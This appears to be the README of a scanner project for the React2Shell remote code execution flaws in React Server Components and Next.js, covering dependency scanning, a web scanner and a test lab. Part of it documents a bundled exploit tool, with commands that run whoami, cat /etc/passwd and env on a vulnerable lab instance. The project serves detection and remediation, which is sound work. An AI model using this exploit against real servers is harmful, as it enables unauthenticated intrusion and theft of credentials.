Scanner for CVE-2025-55182 (React) and CVE-2025-66478 (Next.js) - Track and remediate a critical React Server Components (RSC) / Flight protocol vulnerability campaign impacting react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack, and RSC-enabled frameworks like Next.js.
EXTERNAL Vulnerability for React2Shell class of bugs: two freshly disclosed, unauthenticated remote code execution vulnerabilities in the React Server Components (RSC) "Flight" protocol—CVE-2025-55182 (React) and CVE-2025-66478 (Next.js), both rated CVSS 10.0. These issues live in how RSC/Server Function endpoints decode attacker-controlled Flight payloads, turning a single crafted HTTP request into potential server-side code execution—even on "default" modern React/Next.js stacks using App Router and production builds. For many teams this is a "patch now, verify exposure, then audit" moment, not something to defer to a later dependency hygiene sprint. The LAB folder contains exploits and lab vulnerabilities for React2Shell
This project provides a two-pronged approach: (1) software composition / dependency risk scanning (this tool), to rapidly locate vulnerable libraries and versions, and (2) a web DAST scanner (React2Shell Web Scanner) that actively probes RSC/Flight endpoints from the outside, validating whether exploitable paths are reachable in running environments. Together, they help you answer both "where are the vulnerable components?" and "where can they actually be exploited in production?" so you can prioritize patching, hardening, and incident response with confidence.
For live endpoint testing and RCE validation, see the dedicated web scanner:
📁 web-scan_CVE-2025-66478/ - Full documentation and guide
cd web-scan_CVE-2025-66478
# Install dependencies
pip install -r requirements.txt
# Scan a single target
python3 react2shell-scanner -u https://target.com -v
# Scan with evidence display
python3 react2shell-scanner -u https://target.com --show-evidence
# Batch scan with all export formats
python3 react2shell-scanner -l targets.txt -o results.json --csv results.csv --html report.html
# Test the exploit on vulnerable target (requires Python 3.11+)
python3.11 test-lab/exploit.py -u http://vulnerable-host:3000 -c "hostname"
| Feature | Description |
|---|---|
| 🔍 RCE Detection | Arithmetic-based safe detection (no side effects) |
| 🎯 Technology Fingerprinting | Auto-detect Next.js/React applications |
| 📊 Multi-Format Export | JSON, CSV, HTML reports |
| 🔗 IOC Correlation | Match against 31+ known malicious IPs |
| 🌐 Scale Scanning | CIDR ranges, subdomain enumeration |
| ☁️ Phoenix Integration | Upload findings to Phoenix Security |
| 💻 Exploit Tool | Execute commands on vulnerable targets |
cd web-scan_CVE-2025-66478/test-lab/lab
# Start vulnerable (3011) and patched (3012) instances
docker-compose up -d
# Test vulnerable instance
python3 react2shell-scanner -u http://localhost:3011 --show-evidence
cd web-scan_CVE-2025-66478/test-lab
# Install exploit dependencies
pip3.11 install -r requirements.txt
# Basic command execution
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Output: nextjs
python3.11 exploit.py -u http://localhost:3011 -c "id"
# Output: uid=1001(nextjs) gid=65533(nogroup)
python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Output: 99e28775bf80 (container ID)
# System enumeration
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env"
# Application recon
python3.11 exploit.py -u http://localhost:3011 -c "pwd" # /app
python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"
React2Shell is an unauthenticated remote code execution primitive against React Server Components (RSC) payload handling in the Flight protocol. In practice, this means a malicious client can send a single crafted HTTP request to an RSC/Server Function endpoint and, if a vulnerable version is in play, potentially turn a “web app” into a “server shell.”
At a high level:
Because this is unauthenticated RCE, default production setups are in scope—even if you never explicitly wrote a “server function” and simply adopted modern React/Next.js patterns. Hosting-level mitigations and generic WAFs should not be treated as your primary safety net: they may reduce exposure but won’t reliably compensate for vulnerable libraries. Treat this as an incident:
Once an attacker lands RCE via React2Shell, defenders should assume a familiar kill chain:
.env files, deployment secrets, CI tokens, service credentials, and signing keys.If your DevSecOps pipeline has historically treated the web tier as “just a frontend,” this vulnerability is a concrete demonstration that frontend frameworks can carry deep server-side blast radius when RSC and streaming semantics are involved. Universal Vulnerability Scanner exists to help you rapidly answer “are we running the vulnerable packages anywhere?” and to feed that answer into Phoenix-driven campaigns and, soon, complementary web DAST validation of live RSC endpoints.